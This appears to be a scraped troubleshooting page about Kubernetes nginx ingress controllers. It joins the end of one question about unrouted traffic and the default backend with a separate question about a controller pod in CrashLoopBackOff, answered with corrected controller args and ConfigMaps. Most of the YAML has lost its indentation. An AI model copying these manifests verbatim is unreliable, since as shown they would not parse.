- image: k8s.gcr.io/defaultbackend:1.3
imagePullPolicy: IfNotPresent
livenessProbe:
failureThreshold: 3
httpGet:
path: /healthz
port: 8080
scheme: HTTP
initialDelaySeconds: 30
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 5
name: nginx-ingress-default-backend
ports:
- containerPort: 8080
name: http
protocol: TCP
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
  terminationGracePeriodSeconds: 60
status:
  availableReplicas: 1
  conditions:
- lastTransitionTime: 2018-07-03T21:02:46Z
lastUpdateTime: 2018-07-03T21:02:46Z
message: Deployment has minimum availability.
reason: MinimumReplicasAvailable
status: "True"
type: Available
- lastTransitionTime: 2018-07-28T16:19:57Z
lastUpdateTime: 2018-07-28T16:22:06Z
message: ReplicaSet "fashionable-gopher-nginx-ingress-default-backend-5ffffffff"
has successfully progressed.
reason: NewReplicaSetAvailable
status: "True"
    type: Progressing
  observedGeneration: 1
  readyReplicas: 1
  replicas: 1
  updatedReplicas: 1
Edit
Here's the only ingress I have defined for now:
Name: default-myserver-ingress
Namespace: default
Address:
Default backend: default-http-backend:80 (<none>)
TLS:
myapp-tls-host-secrets terminates someapp.somehostname.com
Rules:
Host Path Backends
---- ---- --------
someapp.somehostname.com
/ my-api:8000 (<none>)
Annotations:
kubectl.kubernetes.io/last-applied-configuration: {"apiVersion":"extensions/v1beta1","kind":"Ingress","metadata":{"annotations":{"kubernetes.io/ingress.class":"nginx"},"name":"default-myserver-ingress","namespace":"default"},"spec":{"rules":[{"host":"someapp.somehostname.com","http":{"paths":[{"backend":{"serviceName":"my-api","servicePort":8000},"path":"/"}]}}],"tls":[{"hosts":["someapp.somehostname.com"],"secretName":"myapp-tls-host-secrets"}]}}
kubernetes.io/ingress.class: nginx
Events: <none>
This Ingress is defined for a hostname such as someapp.somehostname.com. However, this is a CNAME. The A record associated with this IP address is receiving the problematic traffic I mentioned above (even though it's not defined in any of my Ingress definitions), and that traffic is not going to the default backend when I think it should be. Does that make sense?
Edit:
Here's the result of kubectl get deployment fashionable-gopher-nginx-ingress-controller -n kube-system -o yaml:
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "1"
creationTimestamp: 2018-07-03T21:02:46Z
generation: 1
labels:
app: nginx-ingress
chart: nginx-ingress-0.20.3
component: controller
heritage: Tiller
release: fashionable-gopher
name: fashionable-gopher-nginx-ingress-controller
namespace: kube-system
resourceVersion: "7461558"
selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/fashionable-gopher-nginx-ingress-controller
spec:
progressDeadlineSeconds: 600
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
app: nginx-ingress
component: controller
release: fashionable-gopher
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: nginx-ingress
component: controller
release: fashionable-gopher
spec:
containers:
- args:
- /nginx-ingress-controller
- --default-backend-service=kube-system/fashionable-gopher-nginx-ingress-default-backend
- --election-id=ingress-controller-leader
- --ingress-class=nginx
- --configmap=kube-system/fashionable-gopher-nginx-ingress-controller
env:
- name: POD_NAME
valueFrom:
fieldRef:
apiVersion: v1
fieldPath: metadata.name
- name: POD_NAMESPACE
valueFrom:
fieldRef:
apiVersion: v1
fieldPath: metadata.namespace
image: quay.io/kubernetes-ingress-controller/nginx-ingress-controller:0.14.0
imagePullPolicy: IfNotPresent
livenessProbe:
failureThreshold: 3
httpGet:
path: /healthz
port: 10254
scheme: HTTP
initialDelaySeconds: 10
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 1
name: nginx-ingress-controller
ports:
- containerPort: 80
name: http
protocol: TCP
- containerPort: 443
name: https
protocol: TCP
readinessProbe:
failureThreshold: 3
httpGet:
path: /healthz
port: 10254
scheme: HTTP
initialDelaySeconds: 10
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 1
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
serviceAccount: fashionable-gopher-nginx-ingress
serviceAccountName: fashionable-gopher-nginx-ingress
terminationGracePeriodSeconds: 60
status:
availableReplicas: 1
conditions:
- lastTransitionTime: 2018-07-03T21:02:46Z
lastUpdateTime: 2018-07-03T21:02:46Z
message: Deployment has minimum availability.
reason: MinimumReplicasAvailable
status: "True"
type: Available
- lastTransitionTime: 2018-07-28T16:29:07Z
lastUpdateTime: 2018-07-28T16:31:53Z
message: ReplicaSet "fashionable-gopher-nginx-ingress-controller-69d44d4df4" has
successfully progressed.
reason: NewReplicaSetAvailable
status: "True"
type: Progressing
observedGeneration: 1
readyReplicas: 1
replicas: 1
updatedReplicas: 1
I want to set up an Ingress that routes traffic to my underlying Services. Unfortunately, I get an error when I deploy my ingress-controller-deployment.yaml and I don't know why... The pod with the ingress controller crashes immediately with the status "CrashLoopBackOff".
My understanding is that the ingress controller has to be deployed in a Pod, and this Pod can be accessed through the ingress-svc. The ingress-svc seems to work, but the Pod crashes. Once the ingress controller works, I need an additional file that defines the routes and everything. But I don't see the point of continuing without a working and deployable ingress controller.
Pod description:
Name: ingress-controller-7749c785f-x94ll
Namespace: ingress
Node: gke-cluster-1-default-pool-8484e77d-r4wp/10.128.0.2
Start Time: Thu, 26 Apr 2018 14:25:04 +0200
Labels: k8s-app=nginx-ingress-lb
pod-template-hash=330573419
Annotations: kubernetes.io/created-by={"kind":"SerializedReference","apiVersion":"v1","reference":{"kind":"ReplicaSet","namespace":"ingress","name":"ingress-controller-7749c785f","uid":"d8ff0a6d-494c-11e8-a840
-420...
Status: Running
IP: 10.8.0.14
Created By: ReplicaSet/ingress-controller-7749c785f
Controlled By: ReplicaSet/ingress-controller-7749c785f
Containers:
nginx-ingress-controller:
Container ID: docker://5654c7dffc44510132cba303d66ee570280f2cec235e4d4fa6ef8ad543e0c91d
Image: quay.io/kubernetes-ingress-controller/nginx-ingress-controller:0.9.0
Image ID: docker-pullable://quay.io/kubernetes-ingress-controller/nginx-ingress-controller@sha256:39cc6ce23e5bcdf8aa78bc28bbcfe0999e449bf99fe2e8d60984b417facc5cd4
Ports: 80/TCP, 443/TCP
Args:
/nginx-ingress-controller
--admin-backend-svc=$(POD_NAMESPACE)/admin-backend
State: Waiting
Reason: CrashLoopBackOff
Last State: Terminated
Reason: Error
Exit Code: 2
Started: Thu, 26 Apr 2018 14:26:57 +0200
Finished: Thu, 26 Apr 2018 14:26:57 +0200
Ready: False
Restart Count: 4
Liveness: http-get http://:10254/healthz delay=10s timeout=5s period=10s #success=1 #failure=3
Environment:
POD_NAME: ingress-controller-7749c785f-x94ll (v1:metadata.name)
POD_NAMESPACE: ingress (v1:metadata.namespace)
Mounts:
/var/run/secrets/kubernetes.io/serviceaccount from default-token-plbss (ro)
Conditions:
Type Status
Initialized True
Ready False
PodScheduled True
Volumes:
default-token-plbss:
Type: Secret (a volume populated by a Secret)
SecretName: default-token-plbss
Optional: false
QoS Class: BestEffort
Node-Selectors: <none>
Tolerations: node.alpha.kubernetes.io/notReady:NoExecute for 300s
node.alpha.kubernetes.io/unreachable:NoExecute for 300s
Ingress-controller-deployment.yaml
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: ingress-controller
spec:
replicas: 1
revisionHistoryLimit: 3
template:
metadata:
labels:
k8s-app: nginx-ingress-lb
spec:
containers:
- args:
- /nginx-ingress-controller
- "--admin-backend-svc=$(POD_NAMESPACE)/admin-backend"
env:
- name: POD_NAME
valueFrom:
fieldRef:
fieldPath: metadata.name
- name: POD_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
image: "quay.io/kubernetes-ingress-controller/nginx-ingress-controller:0.9.0"
imagePullPolicy: Always
livenessProbe:
httpGet:
path: /healthz
port: 10254
scheme: HTTP
initialDelaySeconds: 10
timeoutSeconds: 5
name: nginx-ingress-controller
ports:
- containerPort: 80
name: http
protocol: TCP
- containerPort: 443
name: https
protocol: TCP
---
apiVersion: v1
kind: Service
metadata:
name: ingress-svc
spec:
type: LoadBalancer
ports:
- name: http
port: 80
targetPort: http
- name: https
port: 443
targetPort: https
selector:
k8s-app: nginx-ingress-lb
The issue is the args. The args on one of mine are:
args:
- /nginx-ingress-controller
- --default-backend-service=$(POD_NAMESPACE)/default-http-backend
- --configmap=$(POD_NAMESPACE)/nginx-configuration
- --tcp-services-configmap=$(POD_NAMESPACE)/tcp-services
- --udp-services-configmap=$(POD_NAMESPACE)/udp-services
- --publish-service=$(POD_NAMESPACE)/ingress-nginx
- --annotations-prefix=nginx.ingress.kubernetes.io
I had also created the ConfigMaps for the configuration, TCP services, and UDP services.
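For completeness, a minimal sketch of those ConfigMaps; the names just have to match what the --configmap, --tcp-services-configmap and --udp-services-configmap flags resolve to, and the namespace here is an assumption (whatever $(POD_NAMESPACE) evaluates to for the controller pod):
apiVersion: v1
kind: ConfigMap
metadata:
  name: nginx-configuration
  namespace: ingress-nginx   # assumption: the controller's namespace
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: tcp-services
  namespace: ingress-nginx
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: udp-services
  namespace: ingress-nginx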